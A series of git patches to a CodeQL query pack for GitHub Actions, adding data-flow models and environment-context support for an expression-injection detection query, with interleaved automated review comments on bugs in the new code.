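Review bot: The version column `"v10, v20, v30, v40"` in `ql/lib/ext/sources.model.yml` is compared by string equality (`uses.getVersion() = version.splitAt(",").trim()` in FlowSources.qll), so a workflow that references `tj-actions/changed-files` by any other tag or by a commit SHA is not recognised as a source. For a security query that is a silent false negative, and pinning by SHA is common practice. Unless only these tags are affected, `"*"` (which the consuming code already handles) is the safer value. The output name `all_changed_file` also looks like it is missing a trailing `s`; it has no effect today because the output column is ignored, but verify it against the action's documented outputs.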
diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 325c63f4625..8cf5ba69354 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -5,11 +5,13 @@ name: codeql/actions-all version: 0.0.1-dev dependencies: codeql/controlflow: ^0.1.7 - codeql/yaml: '*' - codeql/util: '*' + codeql/yaml: "*" + codeql/util: "*" codeql/dataflow: ^0.1.7 dbscheme: yaml.dbscheme extractor: yaml tests: test groups: - - yaml + - yaml +dataExtensions: + - ext/*.model.yml diff --git a/ql/lib/test/test.ql b/ql/lib/test/test.ql index 8d558cbaacd..fe76852fa53 100644 --- a/ql/lib/test/test.ql +++ b/ql/lib/test/test.ql @@ -3,6 +3,7 @@ import codeql.actions.Ast import codeql.actions.Cfg as Cfg import codeql.actions.DataFlow import codeql.Locations +import codeql.actions.dataflow.ExternalFlow query predicate files(File f) { any() } @@ -19,7 +20,7 @@ query predicate stepUsesNodes(StepUsesExpr s) { any() } query predicate jobUsesNodes(JobUsesExpr s) { any() } query predicate usesSteps(UsesExpr call, string argname, Expression arg) { - call.getArgument(argname) = arg + call.getArgumentExpr(argname) = arg } query predicate runSteps1(RunExpr run, string body) { run.getScript() = body } @@ -48,7 +49,7 @@ query predicate parentNodes(AstNode child, AstNode parent) { child.getParentNode query predicate cfgNodes(Cfg::Node n) { //any() - n.getAstNode() instanceof OutputsStmt + n.getAstNode() instanceof ReusableWorkflowOutputsStmt } query predicate dfNodes(DataFlow::Node e) { @@ -68,3 +69,11 @@ query predicate varIds(StepOutputAccessExpr s, string a) { s.getStepId() = a } query predicate nodeLocations(DataFlow::Node n, Location l) { n.getLocation() = l } query predicate scopes(Cfg::CfgScope c) { any() } + +query predicate sources(string action, string version, string output, string kind) { + sourceModel(action, version, output, kind) +} + +query predicate summaries(string action, string version, string input, string output, string kind) { + summaryModel(action, version, input, output, kind) +} 
diff --git a/ql/src/Security/CWE-094/ExpressionInjection.ql b/ql/src/Security/CWE-094/ExpressionInjection.ql index f8d6e0c804b..7953c3b037c 100644 --- a/ql/src/Security/CWE-094/ExpressionInjection.ql +++ b/ql/src/Security/CWE-094/ExpressionInjection.ql @@ -15,9 +15,13 @@ import actions import codeql.actions.TaintTracking import codeql.actions.dataflow.FlowSources +import codeql.actions.dataflow.ExternalFlow private class ExpressionInjectionSink extends DataFlow::Node { - ExpressionInjectionSink() { exists(RunExpr e | e.getScriptExpr() = this.asExpr()) } + ExpressionInjectionSink() { + exists(RunExpr e | e.getScriptExpr() = this.asExpr()) or + sinkNode(this, "expression-injection") + } } private module MyConfig implements DataFlow::ConfigSig { From 4f0b66ea0381f849682efecfb66dcea47652ba18 Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 12 Feb 2024 13:47:44 +0100 Subject: [PATCH 0019/1267] Refactor MaD semantics --- ql/lib/codeql/actions/Ast.qll | 51 ++++++++++++++++--- .../codeql/actions/dataflow/ExternalFlow.qll | 20 ++++++-- .../codeql/actions/dataflow/FlowSources.qll | 25 +++++++-- ql/lib/codeql/actions/dataflow/FlowSteps.qll | 22 ++++++-- .../internal/ExternalFlowExtensions.qll | 4 +- ql/lib/ext/REMOVEME.model.yml | 6 +++ .../frabert-replace-string-action.model.yml | 7 +++ ...-actions-find-and-replace-string.model.yml | 9 ++++ ql/lib/ext/sinks.model.yml | 11 ---- ql/lib/ext/sources.model.yml | 11 ---- ql/lib/ext/summaries.model.yml | 19 ------- ql/lib/ext/tj-actions-changed-files.model.yml | 28 ++++++++++ 12 files changed, 153 insertions(+), 60 deletions(-) create mode 100644 ql/lib/ext/REMOVEME.model.yml create mode 100644 ql/lib/ext/frabert-replace-string-action.model.yml create mode 100644 ql/lib/ext/mad9000-actions-find-and-replace-string.model.yml delete mode 100644 ql/lib/ext/sinks.model.yml delete mode 100644 ql/lib/ext/sources.model.yml delete mode 100644 ql/lib/ext/summaries.model.yml create mode 100644 ql/lib/ext/tj-actions-changed-files.model.yml diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index a25ef856233..697f28b54a2 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -115,6 +115,9 @@ class JobStmt extends Statement instanceof Actions::Job { */ string getId() { result = super.getId() } + /** Gets the workflow that this job is a part of. */ + WorkflowStmt getWorkflowStmt() { result = super.getWorkflow() } + /** Gets the step at the given index within this job. */ StepStmt getStepStmt(int index) { result = super.getStep(index) } 
@@ -181,6 +184,26 @@ class StepStmt extends Statement instanceof Actions::Step { string getId() { result = super.getId() } JobStmt getJobStmt() { result = super.getJob() } + + /** + * Gets a environment variable expression by name in the scope of the current step. + */ + Expression getEnvExpr(string name) { + exists(Actions::StepEnv env | + env.getStep() = this and + env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) + ) + or + exists(Actions::JobEnv env | + env.getJob() = this.getJobStmt() and + env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) + ) + or + exists(Actions::WorkflowEnv env | + env.getWorkflow() = this.getJobStmt().getWorkflowStmt() and + env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) + ) + } } /** @@ -192,6 +215,8 @@ abstract class UsesExpr extends Expression { abstract string getVersion(); abstract Expression getArgumentExpr(string key); + + abstract Expression getEnvExpr(string name); } /** @@ -212,6 +237,8 @@ class StepUsesExpr extends StepStmt, UsesExpr { result = with.lookup(key) ) } + + override Expression getEnvExpr(string name) { result = this.(StepStmt).getEnvExpr(name) } } /** @@ -260,6 +287,23 @@ class JobUsesExpr extends UsesExpr instanceof YamlMapping { override Expression getArgumentExpr(string key) { this.(YamlMapping).lookup("with").(YamlMapping).lookup(key) = result } + + /** + * Gets a environment variable expression by name in the scope of the current node. + */ + override Expression getEnvExpr(string name) { + this.(YamlMapping).lookup("env").(YamlMapping).lookup(name) = result + or + exists(Actions::JobEnv env | + env.getJob() = this.getJobStmt() and + env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) + ) + or + exists(Actions::WorkflowEnv env | + env.getWorkflow() = this.getJobStmt().getWorkflowStmt() and + env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) + ) + } } /** 
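Review bot: `StepStmt.getEnvExpr` returns the step-, job- and workflow-level definitions of `name` through a plain `or`, so when the same variable is defined at more than one level all of them are results, while at run time only the most specific one is in effect. For taint tracking this over-approximates, which may be intended, but the QLDoc should say so: `* If the name is defined at several levels, all definitions are returned; shadowing is not modelled.` `JobUsesExpr.getEnvExpr`, in the later hunk of this file, repeats the job and workflow disjuncts verbatim and additionally looks up `env` on the job mapping itself, which presumably yields the same node as the `Actions::JobEnv` disjunct; a shared helper would avoid the duplication. In both comments "Gets a environment" should be "Gets an environment".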
@@ -272,13 +316,6 @@ class RunExpr extends StepStmt, Expression { Expression getScriptExpr() { result = scriptExpr } - Expression getEnvExpr(string name) { - exists(Actions::StepEnv env | - env.getStep() = this and - env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) - ) - } - string getScript() { result = scriptExpr.getValue() } } diff --git a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll index 6e02e4036ba..b19fbcbaca6 100644 --- a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll +++ b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll @@ -3,8 +3,8 @@ import codeql.actions.DataFlow import actions /** Holds if a source model exists for the given parameters. */ -predicate sourceModel(string action, string version, string output, string kind) { - Extensions::sourceModel(action, version, output, kind) +predicate sourceModel(string action, string version, string output, string trigger, string kind) { + Extensions::sourceModel(action, version, output, trigger, kind) } /** Holds if a sink model exists for the given parameters. */ 
@@ -17,15 +17,27 @@ predicate sinkModel(string action, string version, string input, string kind) { Extensions::sinkModel(action, version, input, kind) } +/** + * MaD sinks + * Fields: + * - action: Fully-qualified action name (NWO) + * - version: Either '*' or a specific SHA/Tag + * - input arg: sink node (prefixed with either `env.` or `input.`) + * - kind: sink kind + */ predicate sinkNode(DataFlow::ExprNode sink, string kind) { exists(UsesExpr uses, string action, string version, string input | - uses.getArgumentExpr(input.splitAt(",").trim()) = sink.asExpr() and + ( + if input.trim().matches("env.%") + then sink.asExpr() = uses.getEnvExpr(input.trim().replaceAll("input\\.", "")) + else sink.asExpr() = uses.getArgumentExpr(input.trim()) + ) and sinkModel(action, version, input, kind) and uses.getCallee() = action and ( if version.trim() = "*" then uses.getVersion() = any(string v) - else uses.getVersion() = version.splitAt(",").trim() + else uses.getVersion() = version.trim() ) ) } diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index 3bde829321f..120444863e5 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll 
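Review bot: In `sinkNode`, the `env.` branch strips the wrong qualifier: `uses.getEnvExpr(input.trim().replaceAll("input\\.", ""))` only runs when the input matches `env.%`, so the name passed to `getEnvExpr` still starts with `env.` and cannot equal a key of an `env` mapping. A sink model written with an `env.` qualifier therefore matches nothing, which shows up as a missed detection rather than as noise. The else branch passes `input.trim()` unchanged, so an explicit `input.` qualifier, which the new doc comment allows, would not match a `with:` key either. Strip the prefix that was just tested, e.g. `input.trim().regexpReplaceAll("^env\\.", "")`; the `env.` branch of `ExternallyDefinedSource` in FlowSources.qll has the same mix-up with `output\\.`.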
@@ -125,19 +125,36 @@ private class EventSource extends RemoteFlowSource { override string getSourceType() { result = "User-controlled events" } } +/** + * MaD sources + * Fields: + * - action: Fully-qualified action name (NWO) + * - version: Either '*' or a specific SHA/Tag + * - output arg: To node (prefixed with either `env.` or `output.`) + * - trigger: Triggering event under which this model introduces tainted data. Use `*` for any event. + */ private class ExternallyDefinedSource extends RemoteFlowSource { string soutceType; ExternallyDefinedSource() { - exists(UsesExpr uses, string action, string version, /*string output,*/ string kind | - sourceModel(action, version, _, kind) and + exists( + UsesExpr uses, string action, string version, string output, string trigger, string kind + | + sourceModel(action, version, output, trigger, kind) and uses.getCallee() = action and ( if version.trim() = "*" then uses.getVersion() = any(string v) - else uses.getVersion() = version.splitAt(",").trim() + else uses.getVersion() = version.trim() + ) and + ( + if output.trim().matches("env.%") + then this.asExpr() = uses.getEnvExpr(output.trim().replaceAll("output\\.", "")) + else + // 'output.' is the default qualifier + // TODO: Taint just the specified output + this.asExpr() = uses ) and - uses = this.asExpr() and soutceType = kind ) } diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index e5fa04427cc..95566aee96c 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll 
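Review bot: The new `trigger` column is bound by `sourceModel(action, version, output, trigger, kind)` in `ExternallyDefinedSource` but is never compared with the events that trigger the enclosing workflow, so a model row restricted to one event would still mark the action as a source under every trigger. Every row added in this commit uses `*`, so results do not change today, but the doc comment describes event scoping that the predicate does not implement. Either add the check or record the gap next to the existing TODO, e.g. `// TODO: trigger is not enforced yet; every row behaves as "*"`. The field is also still spelled `soutceType` in the surrounding context lines.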
@@ -21,16 +21,32 @@ class AdditionalTaintStep extends Unit { abstract predicate step(DataFlow::Node node1, DataFlow::Node node2); } +/** + * MaD summaries + * Fields: + * - action: Fully-qualified action name (NWO) + * - version: Either '*' or a specific SHA/Tag + * - input arg: From node (prefixed with either `env.` or `input.`) + * - output arg: To node (prefixed with either `env.` or `output.`) + * - kind: Either 'Taint' or 'Value' + */ predicate externallyDefinedSummary(DataFlow::Node pred, DataFlow::Node succ) { exists(UsesExpr uses, string action, string version, string input | - /*, string output */ summaryModel(action, version, input, _, "taint") and + // `output` not used yet + summaryModel(action, version, input, _, "taint") and uses.getCallee() = action and ( if version.trim() = "*" then uses.getVersion() = any(string v) - else uses.getVersion() = version.splitAt(",").trim() + else uses.getVersion() = version.trim() + ) and + ( + if input.trim().matches("env.%") + then pred.asExpr() = uses.getEnvExpr(input.trim().replaceAll("env\\.", "")) + else + // 'input.' is the default qualifier + pred.asExpr() = uses.getArgumentExpr(input.trim().replaceAll("input\\.", "")) ) and - pred.asExpr() = uses.getArgumentExpr(input.splitAt(",").trim()) and succ.asExpr() = uses ) } diff --git a/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll b/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll index 89cf4de0261..93ec64b059e 100644 --- a/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll +++ b/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll @@ -5,7 +5,9 @@ /** * Holds if a source model exists for the given parameters. */ -extensible predicate sourceModel(string action, string version, string output, string kind); +extensible predicate sourceModel( + string action, string version, string output, string trigger, string kind +); /** * Holds if a summary model exists for the given parameters. 
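Review bot: As far as I know, `replaceAll` in QL replaces a literal substring rather than a regular expression, so in `externallyDefinedSummary` the calls `replaceAll("env\\.", "")` and `replaceAll("input\\.", "")` search for the text `env\.` with a backslash and leave the qualifier in place. A summary row whose input carries an `env.` or `input.` qualifier would then never resolve to an expression, and only the unqualified rows shipped in this commit take effect. `input.trim().regexpReplaceAll("^env\\.", "")`, and the `^input\\.` equivalent, would strip only a leading qualifier. The `replaceAll` calls added to ExternalFlow.qll and FlowSources.qll in this commit are written the same way.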
diff --git a/ql/lib/ext/REMOVEME.model.yml b/ql/lib/ext/REMOVEME.model.yml new file mode 100644 index 00000000000..b21aa207bb2 --- /dev/null +++ b/ql/lib/ext/REMOVEME.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: sinkModel + data: + - [ "FAKE-mad9000/actions-find-and-replace-string", "*", "source", "expression-injection" ] diff --git a/ql/lib/ext/frabert-replace-string-action.model.yml b/ql/lib/ext/frabert-replace-string-action.model.yml new file mode 100644 index 00000000000..e211fe2b69c --- /dev/null +++ b/ql/lib/ext/frabert-replace-string-action.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: summaryModel + data: + - [ "frabert/replace-string-action", "*", "string", "replaced", "taint" ] + - [ "frabert/replace-string-action", "*", "replace-with", "replaced", "taint" ] diff --git a/ql/lib/ext/mad9000-actions-find-and-replace-string.model.yml b/ql/lib/ext/mad9000-actions-find-and-replace-string.model.yml new file mode 100644 index 00000000000..28517f44568 --- /dev/null +++ b/ql/lib/ext/mad9000-actions-find-and-replace-string.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: summaryModel + data: + - [ "mad9000/actions-find-and-replace-string", "*", "source", "value", "taint" ] + - [ "mad9000/actions-find-and-replace-string", "*", "replace", "value", "taint" ] + - [ "frabert/replace-string-action", "*", "string", "replaced", "taint" ] + - [ "frabert/replace-string-action", "*", "replace-with", "replaced", "taint" ] diff --git a/ql/lib/ext/sinks.model.yml b/ql/lib/ext/sinks.model.yml deleted file mode 100644 index e28ec39d1be..00000000000 --- a/ql/lib/ext/sinks.model.yml +++ /dev/null @@ -1,11 +0,0 @@ -extensions: - - addsTo: - pack: codeql/actions-all - extensible: sinkModel - data: - - [ - "FAKE-mad9000/actions-find-and-replace-string", - "*", - "source", - "expression-injection", - ] 
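Review bot: The two `frabert/replace-string-action` rows are added in `frabert-replace-string-action.model.yml` and again at the end of `mad9000-actions-find-and-replace-string.model.yml`. Duplicate tuples do not change what the extensible predicate holds, but they undercut the one-file-per-action layout this commit introduces and will drift when only one copy is edited. Drop the last two rows from the mad9000 file so that it holds only `mad9000/actions-find-and-replace-string` entries.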
diff --git a/ql/lib/ext/sources.model.yml b/ql/lib/ext/sources.model.yml deleted file mode 100644 index 666a5532865..00000000000 --- a/ql/lib/ext/sources.model.yml +++ /dev/null @@ -1,11 +0,0 @@ -extensions: - - addsTo: - pack: codeql/actions-all - extensible: sourceModel - data: - - [ - "tj-actions/changed-files", - "v10, v20, v30, v40", - "all_changed_file", - "PR", - ] diff --git a/ql/lib/ext/summaries.model.yml b/ql/lib/ext/summaries.model.yml deleted file mode 100644 index cc8e2df5fe9..00000000000 --- a/ql/lib/ext/summaries.model.yml +++ /dev/null @@ -1,19 +0,0 @@ -extensions: - - addsTo: - pack: codeql/actions-all - extensible: summaryModel - data: - - [ - "mad9000/actions-find-and-replace-string", - "*", - "source, replace", - "value", - "taint", - ] - - [ - "frabert/replace-string-action", - "*", - "string, replace-with", - "replaced", - "taint", - ] diff --git a/ql/lib/ext/tj-actions-changed-files.model.yml b/ql/lib/ext/tj-actions-changed-files.model.yml new file mode 100644 index 00000000000..a3f687a0611 --- /dev/null +++ b/ql/lib/ext/tj-actions-changed-files.model.yml 
@@ -0,0 +1,28 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: sourceModel + data: + - [ "tj-actions/changed-files", "*", "added_files", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "all_changed_and_modified_files", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "all_changed_files", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "all_modified_files", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "all_old_new_renamed_files", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "any_changed", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "any_deleted", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "any_modified", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "changed_keys", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "copied_files", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "deleted_files", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "modified_files", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "modified_keys", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "only_changed", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "only_deleted", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "only_modified", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "other_changed_files", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "other_deleted_files", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "other_modified_files", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "renamed_files", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "type_changed_files", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "unknown_files", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", 
"unmerged_files", "*", "PR changed files" ] From 4b57cee300fba6fa9a7268a9a88a4fe402a75f03 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 12 Feb 2024 15:12:36 +0100 Subject: [PATCH 0020/1267] Initial implementaion of env context support --- ql/lib/codeql/actions/Ast.qll | 48 +++++++++----- ql/lib/codeql/actions/dataflow/FlowSteps.qll | 5 +- .../dataflow/internal/DataFlowPrivate.qll | 65 +++++++++++-------- .../.github/workflows/argus_case_study.yml | 29 +++++++++ 4 files changed, 101 insertions(+), 46 deletions(-) create mode 100644 ql/src/test/.github/workflows/argus_case_study.yml diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 697f28b54a2..ec05fa309d3 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -330,11 +330,14 @@ class ExprAccessExpr extends Expression instanceof YamlString { string getExpression() { result = expr } JobStmt getJobStmt() { result.getAChildNode*() = this } + + abstract Expression getRefExpr(); } /** - * A ExprAccessExpr where the expression evaluated is a step output read. - * eg: `${{ steps.changed-files.outputs.all_changed_files }}` + * Holds for an ExprAccessExpr accesing the `steps` context. + * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability + * e.g. `${{ steps.changed-files.outputs.all_changed_files }}` */ class StepOutputAccessExpr extends ExprAccessExpr { string stepId; 
@@ -347,17 +350,16 @@ class StepOutputAccessExpr extends ExprAccessExpr { this.getExpression().regexpCapture("steps\\.[A-Za-z0-9_-]+\\.outputs\\.([A-Za-z0-9_-]+)", 1) } - string getStepId() { result = stepId } - - string getVarName() { result = varName } - - StepStmt getStepStmt() { result.getId() = stepId } + override Expression getRefExpr() { + this.getJobStmt() = result.(StepStmt).getJobStmt() and + result.(StepStmt).getId() = stepId + } } /** - * A ExprAccessExpr where the expression evaluated is a job output read. - * eg: `${{ needs.job1.outputs.foo}}` - * eg: `${{ jobs.job1.outputs.foo}}` (for reusable workflows) + * Holds for an ExprAccessExpr accesing the `needs` or `job` contexts. + * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability + * e.g. `${{ needs.job1.outputs.foo}}` or `${{ jobs.job1.outputs.foo}}` (for reusable workflows) */ class JobOutputAccessExpr extends ExprAccessExpr { string jobId; @@ -372,9 +374,7 @@ class JobOutputAccessExpr extends ExprAccessExpr { .regexpCapture("(needs|jobs)\\.[A-Za-z0-9_-]+\\.outputs\\.([A-Za-z0-9_-]+)", 2) } - string getVarName() { result = varName } - - Expression getOutputExpr() { + override Expression getRefExpr() { exists(JobStmt job | job.getId() = jobId and job.getLocation().getFile() = this.getLocation().getFile() and @@ -391,8 +391,9 @@ class JobOutputAccessExpr extends ExprAccessExpr { } /** - * A ExprAccessExpr where the expression evaluated is a reusable workflow input read. - * eg: `${{ inputs.foo}}` + * Holds for an ExprAccessExpr accesing the `inputs` context. + * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability + * e.g. `${{ inputs.foo }}` */ class ReusableWorkflowInputAccessExpr extends ExprAccessExpr { string paramName; 
@@ -401,12 +402,23 @@ class ReusableWorkflowInputAccessExpr extends ExprAccessExpr { paramName = this.getExpression().regexpCapture("inputs\\.([A-Za-z0-9_-]+)", 1) } - string getParamName() { result = paramName } - - Expression getInputExpr() { + override Expression getRefExpr() { exists(ReusableWorkflowStmt w | w.getLocation().getFile() = this.getLocation().getFile() and w.getInputsStmt().getInputExpr(paramName) = result ) } } + +/** + * Holds for an ExprAccessExpr accesing the `env` context. + * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability + * e.g. `${{ env.foo }}` + */ +class EnvAccessExpr extends ExprAccessExpr { + string varName; + + EnvAccessExpr() { varName = this.getExpression().regexpCapture("env\\.([A-Za-z0-9_-]+)", 1) } + + override Expression getRefExpr() { exists(RunExpr s | s.getEnvExpr(varName) = result) } +} diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index 95566aee96c..cafd6083276 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll @@ -81,7 +81,10 @@ predicate runEnvToScriptstep(DataFlow::Node pred, DataFlow::Node succ) { exists(string script, string line | script = r.getScript() and line = script.splitAt("\n") and - line.regexpMatch(".*::set-output\\s+name.*") and + ( + line.regexpMatch(".*::set-output\\s+name.*") or + line.regexpMatch(".*>>\\s*$GITHUB_ENV.*") + ) and script.indexOf("$" + ["", "{", "ENV{"] + varName) > 0 ) and succ.asExpr() = r diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index 76495e3f80c..ee59e25ab20 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll 
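Review bot: `EnvAccessExpr.getRefExpr` is `exists(RunExpr s | s.getEnvExpr(varName) = result)` with nothing relating `s` to the access, so `${{ env.foo }}` resolves to a `foo` defined for any run step in any analysed workflow. Through `envCtxLocalStep` that becomes a local flow edge between unrelated files, and alerts can then pair a source and a sink that never execute together. Tie `s` to the access, for instance `exists(RunExpr s | s.getJobStmt() = this.getJobStmt() and s.getEnvExpr(varName) = result)`, or to the enclosing step if that can be recovered. The later `@@ -420,5 +438,11 @@` revision of this predicate adds `JobUsesExpr` and `StepUsesExpr` branches but leaves all three unscoped.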
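Review bot: In `runEnvToScriptstep`, the added alternative `line.regexpMatch(".*>>\\s*$GITHUB_ENV.*")` leaves `$` unescaped, so the regex engine reads it as an end-of-input anchor followed by `GITHUB_ENV`, and the pattern cannot match a line that redirects to `$GITHUB_ENV`. The new branch is effectively dead, so scripts that write attacker-influenced values into the environment file are not picked up by this step. Escape the dollar, `".*>>\\s*\\$GITHUB_ENV.*"`, and consider accepting the quoted and braced spellings (`"$GITHUB_ENV"`, `${GITHUB_ENV}`) as well. The predicate body starts above the hunk.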
@@ -164,41 +164,52 @@ class ArgumentPosition extends string { */ predicate parameterMatch(ParameterPosition ppos, ArgumentPosition apos) { ppos = apos } -predicate stepUsesOutputDefToUse(Node nodeFrom, Node nodeTo) { - // nodeTo is an OutputVarAccessExpr scoped with the namespace of the nodeFrom Step output - exists(StepUsesExpr uses, StepOutputAccessExpr outputRead | - uses = nodeFrom.asExpr() and - outputRead = nodeTo.asExpr() and - outputRead.getStepId() = uses.getId() and - uses.getJobStmt() = outputRead.getJobStmt() +/** + * Holds if there is a local flow step between a ${{}} expression accesing a step output variable and the step output itself + * e.g. ${{ steps.step1.output.foo }} + */ +predicate stepsCtxLocalStep(Node nodeFrom, Node nodeTo) { + exists(StepStmt astFrom, StepOutputAccessExpr astTo | + (astFrom instanceof UsesExpr or astFrom instanceof RunExpr) and + astFrom = nodeFrom.asExpr() and + astTo = nodeTo.asExpr() and + astTo.getRefExpr() = astFrom ) } -predicate runOutputDefToUse(Node nodeFrom, Node nodeTo) { - // nodeTo is an OutputVarAccessExpr scoped with the namespace of the nodeFrom Step output - exists(RunExpr uses, StepOutputAccessExpr outputRead | - uses = nodeFrom.asExpr() and - outputRead = nodeTo.asExpr() and - outputRead.getStepId() = uses.getId() and - uses.getJobStmt() = outputRead.getJobStmt() - ) -} - -predicate jobOutputDefToUse(Node nodeFrom, Node nodeTo) { - // nodeTo is a JobOutputAccessExpr and nodeFrom is the Job output expression +/** + * Holds if there is a local flow step between a ${{}} expression accesing a job output variable and the job output itself + * e.g. 
${{ needs.job1.output.foo }} or ${{ job.job1.output.foo }} + */ +predicate jobsCtxLocalStep(Node nodeFrom, Node nodeTo) { exists(Expression astFrom, JobOutputAccessExpr astTo | astFrom = nodeFrom.asExpr() and astTo = nodeTo.asExpr() and - astTo.getOutputExpr() = astFrom + astTo.getRefExpr() = astFrom ) } -predicate reusableWorkflowInputDefToUse(Node nodeFrom, Node nodeTo) { - // nodeTo is a ReusableWorkflowInputAccessExpr and nodeFrom is the ReusableWorkflowStmt corresponding parameter expression +/** + * Holds if there is a local flow step between a ${{}} expression accesing a reusable workflow input variable and the input itself + * e.g. ${{ inputs.foo }} + */ +predicate inputsCtxLocalStep(Node nodeFrom, Node nodeTo) { exists(Expression astFrom, ReusableWorkflowInputAccessExpr astTo | astFrom = nodeFrom.asExpr() and astTo = nodeTo.asExpr() and - astTo.getInputExpr() = astFrom + astTo.getRefExpr() = astFrom + ) +} + +/** + * Holds if there is a local flow step between a ${{}} expression accesing an env var and the var definition itself + * e.g. ${{ env.foo }} + */ +predicate envCtxLocalStep(Node nodeFrom, Node nodeTo) { + exists(Expression astFrom, EnvAccessExpr astTo | + astFrom = nodeFrom.asExpr() and + astTo = nodeTo.asExpr() and + astTo.getRefExpr() = astFrom ) } @@ -209,10 +220,10 @@ predicate reusableWorkflowInputDefToUse(Node nodeFrom, Node nodeTo) { */ pragma[nomagic] predicate localFlowStep(Node nodeFrom, Node nodeTo) { - stepUsesOutputDefToUse(nodeFrom, nodeTo) or - runOutputDefToUse(nodeFrom, nodeTo) or - jobOutputDefToUse(nodeFrom, nodeTo) or - reusableWorkflowInputDefToUse(nodeFrom, nodeTo) + stepsCtxLocalStep(nodeFrom, nodeTo) or + jobsCtxLocalStep(nodeFrom, nodeTo) or + inputsCtxLocalStep(nodeFrom, nodeTo) or + envCtxLocalStep(nodeFrom, nodeTo) } /** diff --git a/ql/src/test/.github/workflows/argus_case_study.yml b/ql/src/test/.github/workflows/argus_case_study.yml new file mode 100644 index 00000000000..7b9c5735488 --- /dev/null 
